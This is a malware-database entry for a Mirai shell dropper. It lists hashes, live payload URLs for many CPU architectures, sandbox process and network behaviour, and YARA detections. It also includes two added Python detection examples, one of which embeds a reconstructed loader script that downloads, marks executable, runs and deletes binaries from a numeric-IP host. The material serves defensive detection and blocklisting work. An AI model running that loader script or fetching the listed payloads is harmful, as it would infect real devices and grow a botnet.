MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 a4b3c1d8998ea6d0d8e5b26fd084a6a7855c24c24df2a3af62ecfaf70a021bc8. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



Signature: Mirai
Vendor detections: 9

SHA256 hash: a4b3c1d8998ea6d0d8e5b26fd084a6a7855c24c24df2a3af62ecfaf70a021bc8
SHA3-384 hash: a6eee95d6b08ec11cfc1cdc88914cdcc181e6945cf475d35ded2b2b89c7638e9363131856692e78e5722d0a319f1cdb7
SHA1 hash: 72f5a9095e542b4220875e4da997c286c69fc8e4
MD5 hash: 7175b22fa036827b323d1d6e4a2dd998
humanhash: kansas-quebec-mirror-hamper
File name: newreaxe.sh
Signature: Mirai
File size: 3'197 bytes
First seen: 2025-12-31 19:21:12 UTC
Last seen: Never
File type: sh
MIME type: text/x-shellscript
ssdeep: 96:ih0thzyhaXh18hpAhOlhgFhZeLh8rhbeh36hGf3hOVhD5:a0XzKax1EpIOvgPZY81b23SGfRO/D5
TLSH: T1826188F7A2C247306EA95972A3A8D504BCC5E1F3B9962E345CF924FEE48CE043744957
TrID: 70.0% (.SH) Linux/UNIX shell script (7000/1)
      30.0% (.) Unix-like shebang (var.3) (gen) (3000/1)
Magika: shell
Reporter: abuse_ch
Tags: mirai sh
URL | Malware sample (SHA256 hash) | Signature | Tags
http://130.12.180.72/x7k2m9v8b/m9x7k2v8b3.x86 | a032e7a7053822b6d37f8dc47c093ee0ba09ca5b95ad8413f8511fb0cf9c8abd | Mirai | elf geofenced mirai ua-wget USA x86
http://130.12.180.72/x7k2m9v8b/m9x7k2v8b3.mips | 50fb71af4bd1a64094411511e589a57204996c4d710205183077c33bd519a691 | Mirai | elf mirai ua-wget
http://130.12.180.72/x7k2m9v8b/m9x7k2v8b3.arc | d76564ccae6da46add86edce0bb04f496cd1314627037762b9af384f8b559d98 | Mirai | elf mirai ua-wget
http://130.12.180.72/x7k2m9v8b/m9x7k2v8b3.i686 | b5d446d3991fb2adbb7e31a3ecb733973183363f9efb07f32ec27272e835953f | Mirai | elf geofenced mirai ua-wget USA x86
http://130.12.180.72/x7k2m9v8b/m9x7k2v8b3.x86_64 | c032550cc344c3f14b7c564ea58a3c5159ed4e8edb4266f59bfc3e7e8a13ea9e | Mirai | elf mirai ua-wget
http://130.12.180.72/x7k2m9v8b/m9x7k2v8b3.mpsl | eb3418495b5dfb16051c2de9bb8b5bc66e9b41e1d3d99e3ea99ff6a6d6259331 | Mirai | elf geofenced mips mirai ua-wget USA
http://130.12.180.72/x7k2m9v8b/m9x7k2v8b3.arm | a438ffb10ea3becb4c73479c32cbbbbd4bc10d9fb0b6b7b9f098a10ae0edc325 | Mirai | elf mirai ua-wget
http://130.12.180.72/x7k2m9v8b/m9x7k2v8b3.arm5 | 4a9c10ff6a733c2d5b6f36efe6bc90eeec03d8a02c3cfbb176ba3c6e8959281d | Mirai | arm elf geofenced mirai ua-wget USA
http://130.12.180.72/x7k2m9v8b/m9x7k2v8b3.arm6 | e71d81bf192f040d0ea8745ee49be356c84ab886538fc96f2cae915e31b019c3 | Mirai | arm elf geofenced mirai ua-wget USA
http://130.12.180.72/x7k2m9v8b/m9x7k2v8b3.arm7 | 888a0bbfc855fdd57b1ffc7959b837e1f75fb344b6a871eb3a96865ebf4938d8 | Mirai | arm elf geofenced mirai ua-wget USA
http://130.12.180.72/x7k2m9v8b/m9x7k2v8b3.ppc | a4f605c2274bb2aabae86e5b5fb0bfe540353981dcb49b4f3a57ae4fbfb64c8c | Mirai | elf mirai ua-wget
http://130.12.180.72/x7k2m9v8b/m9x7k2v8b3.spc | 70187d1faf0c941e42fabedcc9b769bda9090d5e90c4f9585c57b5d0bcca27b8 | Mirai | elf mirai ua-wget
http://130.12.180.72/x7k2m9v8b/m9x7k2v8b3.m68k | 76c85b80fb3f7aac818f1d79d98750e665275d4060b5ba81c0366b9fe84ca948 | Mirai | elf geofenced m68k mirai ua-wget USA
http://130.12.180.72/x7k2m9v8b/m9x7k2v8b3.sh4 | 17e065d59586f2fc634de3340309c609b8ed11c7606df41e6583cba42571169f | Mirai | elf geofenced mirai SuperH ua-wget USA

Intelligence


File Origin
# of uploads: 1
# of downloads: 54
Origin country: DE

Vendor Threat Intelligence

No detections

Verdict: Malicious
File Type: unix shell
First seen: 2025-12-31T16:19:00Z
Last seen: 2026-01-02T05:33:00Z
Hits: ~10
Status: terminated
Behavior Graph: (rendered graph not reproduced; the process and network edges below are recovered from the graph data)

Process chain, rooted at /usr/bin/sudo (pid 2819) -> /tmp/sample.bin (pid 2822):
  sample.bin runs cp once, then loops once per architecture: wget and curl (net, send-data, write-file) -> chmod -> execve of the dropped /tmp/m9x7k2v8b3.<arch> -> rm (delete-file). In the rounds where no payload executes, the chmod is followed by a bash clone and then the rm.
  Dropped payloads that did execute: /tmp/m9x7k2v8b3.x86 (pid 2864, net), /tmp/m9x7k2v8b3.i686 (pid 3523, net), /tmp/m9x7k2v8b3.x86_64 (pid 4336, mprotect-exec, net). Each forks further copies of itself; the children are tagged dns, net and send-data and end as zombies.

Network edges:
  wget (pid 2831) and curl (pid 2842) -> 130.12.180.72:80, 152 B and 101 B sent; every later wget/curl pair -> play.mclighthouse.ir:80, 101 to 155 B sent each
  payload children -> 8.8.8.8:53 (38 B, 780 B and 975 B sends), play.mclighthouse.ir:6742 (17 B, from the x86 and i686 payloads), 65.222.202.53:80 (2 to 4 B)
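The chain in the behaviour graph (fetch with wget/curl, chmod, execute from /tmp, delete, once per architecture) is what a host-based detection should key on. The following is an added example, not MalwareBazaar's or any sandbox vendor's code: it correlates execve records per parent process and raises an alert when a binary in a scratch directory is executed after a sibling wget/curl fetched it, then marks the later chmod and rm. The record shape (pid, ppid, exe, argv) and the argv values are assumptions; EVENTS is constructed to follow the graph's pids and paths and is not real sandbox output.

```python
"""Correlate execve telemetry into the fetch -> chmod -> execute -> delete chain
that the behaviour graph on this page shows for /tmp/m9x7k2v8b3.<arch>.

Added example, not MalwareBazaar's or any sandbox vendor's code. The event shape
(pid, ppid, exe, argv) is an assumption, and EVENTS is constructed to follow the
graph's process chain; it is not real sandbox output.
"""
from dataclasses import dataclass
from typing import Optional

# Directories an IoT loader typically writes to; the graph shows /tmp.
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/var/run/", "/mnt/")
FETCHERS = {"wget", "curl", "tftp", "ftpget"}


@dataclass(frozen=True)
class ExecEvent:
    pid: int
    ppid: int
    exe: str
    argv: tuple


@dataclass
class Alert:
    parent: int
    path: str
    url: Optional[str]
    fetched_by: int
    chmod_by: Optional[int]
    exec_pid: int
    removed_by: Optional[int] = None

    def stages(self) -> tuple:
        """Which links of the chain were observed, in order."""
        s = ["fetch"]
        if self.chmod_by is not None:
            s.append("chmod")
        s.append("exec")
        if self.removed_by is not None:
            s.append("rm")
        return tuple(s)


def _basename(token: str) -> str:
    """Last path/URL component, so '-O /tmp/x' and 'http://h/p/x' share a key."""
    return token.split("?", 1)[0].rstrip("/").rsplit("/", 1)[-1]


def detect_chains(events) -> list:
    """One Alert per scratch-dir binary executed after a sibling fetched it."""
    fetched = {}   # (ppid, basename) -> {"pid", "url", "chmod"}
    alerts = {}    # (ppid, basename) -> Alert
    for ev in events:
        tool = _basename(ev.exe)
        args = [a for a in ev.argv[1:] if not a.startswith("-")]
        if tool in FETCHERS:
            url = next((a for a in args if "://" in a), None)
            for a in args:
                # keep the first fetcher; wget and curl both try the same file
                fetched.setdefault((ev.ppid, _basename(a)),
                                   {"pid": ev.pid, "url": url, "chmod": None})
        elif tool == "chmod":
            for a in args:
                rec = fetched.get((ev.ppid, _basename(a)))
                if rec:
                    rec["chmod"] = ev.pid
        elif tool == "rm":
            for a in args:
                alert = alerts.get((ev.ppid, _basename(a)))
                if alert:
                    alert.removed_by = ev.pid
        elif ev.exe.startswith(SCRATCH_DIRS):
            key = (ev.ppid, _basename(ev.exe))
            rec = fetched.get(key)
            if rec:
                alerts[key] = Alert(ev.ppid, ev.exe, rec["url"], rec["pid"],
                                    rec["chmod"], ev.pid)
    return list(alerts.values())


# Constructed records mirroring the first round of the graph (pids as shown
# there; argv is assumed), plus two benign controls under another parent.
EVENTS = [
    ExecEvent(2822, 2819, "/tmp/sample.bin", ("/bin/sh", "/tmp/sample.bin")),
    ExecEvent(2831, 2822, "/usr/bin/wget", ("wget", "http://130.12.180.72/x7k2m9v8b/m9x7k2v8b3.x86", "-O", "/tmp/m9x7k2v8b3.x86")),
    ExecEvent(2842, 2822, "/usr/bin/curl", ("curl", "-o", "/tmp/m9x7k2v8b3.x86", "http://130.12.180.72/x7k2m9v8b/m9x7k2v8b3.x86")),
    ExecEvent(2862, 2822, "/usr/bin/chmod", ("chmod", "+x", "/tmp/m9x7k2v8b3.x86")),
    ExecEvent(2864, 2822, "/tmp/m9x7k2v8b3.x86", ("./m9x7k2v8b3.x86",)),
    ExecEvent(3390, 2822, "/usr/bin/rm", ("rm", "-rf", "/tmp/m9x7k2v8b3.x86")),
    # Benign: a download that is read, not executed.
    ExecEvent(4001, 4000, "/usr/bin/curl", ("curl", "-o", "/tmp/report.csv", "https://example.org/report.csv")),
    ExecEvent(4002, 4000, "/usr/bin/cat", ("cat", "/tmp/report.csv")),
    # Benign: something run from /tmp that nothing under this parent fetched.
    ExecEvent(4003, 4000, "/tmp/build/configure", ("./configure",)),
]

if __name__ == "__main__":
    for a in detect_chains(EVENTS):
        print(a.parent, a.path, a.url, a.stages())
```

Keying on the parent pid plus file basename is deliberate: the loader's own cwd is unknown to a telemetry consumer, and wget's `-O` target and the URL's last component must resolve to the same file. The two controls show that a downloaded file that is only read, or a /tmp binary with no sibling fetch, does not alert.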
Threat name: Linux.Downloader.Medusa
Status: Malicious
First seen: 2025-12-31 18:24:49 UTC
File Type: Text (Shell)
AV detection: 15 of 24 (62.50%)
Threat level: 3/5

Result
Malware family:
Score: 10/10
Tags: family:mirai antivm botnet defense_evasion discovery linux upx
Behaviour:
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
Checks CPU configuration
UPX packed file
Enumerates running processes
Writes file to system bin folder
File and Directory Permissions Modification
Executes dropped EXE
Modifies Watchdog functionality
Mirai
Mirai family

Please note that we are no longer able to provide a coverage score for VirusTotal.

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name: Linux_Shellscript_Downloader
Author: albertzsigovits
Description: Generic Approach to Shellscript downloaders

Rule name: MAL_Linux_IoT_MultiArch_BotnetLoader_Generic
Author: Anish Bogati
Description: Technique-based detection of IoT/Linux botnet loader shell scripts downloading binaries from numeric IPs, chmodding, and executing multi-architecture payloads
Reference: MalwareBazaar sample lilin.sh
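The description of MAL_Linux_IoT_MultiArch_BotnetLoader_Generic (download from a numeric IP, chmod, execute multi-architecture payloads) names exactly the technique this dropper uses, and it is worth seeing that logic spelled out. The following Python is an added example, not the YARA rule itself and not MalwareBazaar code: it scores a shell script on those traits and pulls out the numeric-IP URLs for blocklisting. SAMPLE_SCRIPT is constructed to mirror the URL list and process chain recorded on this page and is not the real newreaxe.sh; BENIGN_SCRIPT is a constructed control; the regexes are the author's assumptions about how such loaders are written.

```python
"""Technique-based triage of Linux/IoT multi-architecture loader scripts.

Added example, not the YARA rule's logic nor MalwareBazaar code. It checks the
traits the rule description names: download from a numeric IP, a chmod that
makes the download executable, execution of the dropped file, several
architecture suffixes on one base name, and cleanup afterwards. SAMPLE_SCRIPT is
constructed to mirror the URL list and process chain on this page; it is not the
real newreaxe.sh. BENIGN_SCRIPT is a constructed control.
"""
import re
from dataclasses import dataclass

URL_RE = re.compile(r"https?://(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?/\S+")
TOOL_RE = re.compile(r"\b(wget|curl|tftp|ftpget)\b")
ARCH_RE = re.compile(
    r"\b(x86_64|i686|x86|mipsel|mpsl|mips|arm[4-7]?|ppc|spc|sparc|m68k|sh4|arc)\b")
CHMOD_RE = re.compile(r"\bchmod\s+(?:\+x|[0-7]{3,4})\b")
EXEC_RE = re.compile(r"(?:^\s*|[;&|]\s*)\./\S+", re.M)   # runs a file in cwd
RM_RE = re.compile(r"\brm\s+-[rf]+\b")

# Constructed: same host/path layout as the IOC table, wget then curl, then
# chmod/exec/rm per architecture, as the sandbox process chain shows.
SAMPLE_SCRIPT = r"""#!/bin/sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
for a in x86 mips arc i686 x86_64 mpsl arm arm5 arm6 arm7 ppc spc m68k sh4; do
  wget http://130.12.180.72/x7k2m9v8b/m9x7k2v8b3.$a -O m9x7k2v8b3.$a; curl -O http://130.12.180.72/x7k2m9v8b/m9x7k2v8b3.$a
  chmod +x m9x7k2v8b3.$a
  ./m9x7k2v8b3.$a
  rm -rf m9x7k2v8b3.$a
done
"""

# Constructed control: fetches from a hostname over HTTPS, one artifact, no chmod.
BENIGN_SCRIPT = r"""#!/bin/sh
set -e
curl -fsSL https://example.org/tool.tar.gz -o tool.tar.gz
tar xzf tool.tar.gz
./tool/configure && make
"""


@dataclass
class Verdict:
    numeric_ip_hosts: set
    fetch_tools: set
    arch_suffixes: set
    chmod: bool
    exec_dropped: bool
    cleanup: bool

    def score(self) -> int:
        """Number of loader traits present, 0 to 6."""
        return sum([
            bool(self.numeric_ip_hosts), bool(self.fetch_tools),
            len(self.arch_suffixes) >= 2, self.chmod, self.exec_dropped, self.cleanup,
        ])

    def is_loader(self) -> bool:
        """The rule's core technique: numeric-IP fetch, chmod, exec, >= 2 architectures."""
        return (bool(self.numeric_ip_hosts) and self.chmod
                and self.exec_dropped and len(self.arch_suffixes) >= 2)


def triage(script: str) -> Verdict:
    return Verdict(
        numeric_ip_hosts={m.group(1) for m in URL_RE.finditer(script)},
        fetch_tools=set(TOOL_RE.findall(script)),
        arch_suffixes=set(ARCH_RE.findall(script)),
        chmod=bool(CHMOD_RE.search(script)),
        exec_dropped=bool(EXEC_RE.search(script)),
        cleanup=bool(RM_RE.search(script)),
    )


def extract_urls(script: str) -> list:
    """Deduplicated numeric-IP download URLs, for blocklists or pivoting."""
    return sorted({m.group(0) for m in URL_RE.finditer(script)})


if __name__ == "__main__":
    for name, text in (("sample", SAMPLE_SCRIPT), ("benign", BENIGN_SCRIPT)):
        v = triage(text)
        print(name, v.score(), v.is_loader(), sorted(v.arch_suffixes))
    print(extract_urls(SAMPLE_SCRIPT))
```

The architecture list is matched as bare tokens rather than as URL suffixes so that both the loop form above and the unrolled form (one wget/chmod/exec line per architecture) score the same; a single download with an exec is not enough on its own, which keeps ordinary install scripts below the threshold.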

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Delivery method: Web download (distributed via web download)
Signature: Mirai
File type and SHA256: sh a4b3c1d8998ea6d0d8e5b26fd084a6a7855c24c24df2a3af62ecfaf70a021bc8 (this sample)
